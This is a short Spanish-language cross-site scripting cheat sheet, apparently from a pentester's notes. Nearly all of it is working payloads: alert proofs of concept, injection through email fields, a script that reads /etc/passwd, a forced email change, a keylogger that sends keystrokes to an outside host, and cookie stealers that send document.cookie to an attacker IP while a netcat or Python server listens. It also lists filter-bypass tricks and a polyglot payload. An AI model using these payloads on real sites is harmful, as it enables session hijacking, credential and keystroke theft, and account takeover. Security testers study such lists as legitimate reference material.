✏️XSS
I am the xssrat
Simple XSS PoC:
<script>alert('uwu')</script>
XSS en campo EMAIL:
test+(<script>alert(uwu)</script>)@email.com
test@email(<script>alert(uwu)</script>).com
"<script>alert(uwu)</script>"@email.com
Leer Archivos Locales:
<script>
x=new XMLHttpRequest;
x.onload=function(){document.write(btoa(this.responseText))};
http://x.open("GET","file:///etc/passwd");x.send();
</script>
DOM XSS
?parametro=\u003cimg\u0020src\u003dx\u0020onerror\u003d\u0022confirm(document.domain)\u0022\u003e
Cambiar Email:
<script>user.changeEmail('[email protected]');</script>
Key Logger
<script>document.onkeypress = funtion(e) {fetch('https://web.com/log?key=' +btoa(e.key));}</script>
----------------------------------------------------------------------------
Cookie Stealers:
Cookie Steal en escucha:
nc -lvnp 1234
<script>fetch('http://<IPa>:1234?cookie=' + btoa(document.cookie) );</script>
Cookie Steal - Python Server:
dev tool > STORAGE > HTTPonly en FALSE para funcionar
python3 -m http.server 80
<script>var i=new Image;i.src="http://<IPa>"+document.cookie;</script>
----------------------------------------------------------------------------------------
Filter Bypass:
XSS Polyglot:
JavaScript://%250Aalert?.(uwu)//'/*\'/*"/*\"/*/*\/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(uwu)}//><Base/Href=//X55.is\76-->
Cerrando Tags:
"><script>alert('uwu');</script>
JS code:
';alert('uwu');//
Script banned:
<sscriptcript>alert('uwu');</sscriptcript>
‘<>’ Banned:
# En atributo de tab "IMG"
onload="alert('uwu');
Última actualización